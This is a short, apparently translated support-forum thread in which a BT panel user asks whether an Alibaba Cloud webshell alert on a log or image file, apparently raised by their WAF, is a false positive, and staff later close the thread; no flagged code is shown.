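宝塔用户_qyujyn posted on 2024-11-14 04:19:54

[Completed] Alibaba Cloud found a log/image file containing WEBSHELL code, I.

To help us understand and handle your issue quickly, please provide the following basic information:
Panel / plugin version: 9.2
System version: DEBIAN12
Problem description: Alibaba Cloud found a log/image file containing WEBSHELL code
Related screenshots (logs, errors):
Flagged file:

Malicious code shown: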




宝塔用户_qyujyn posted on 2024-11-14 04:20:47

It looks like the detection is on the WAF. I have purchased the professional edition of the WAF; is this a false positive?

堡塔运维南一 posted on 2024-12-6 16:13:20

Hello, if this issue has not been resolved, please open a new thread; this thread is now closed.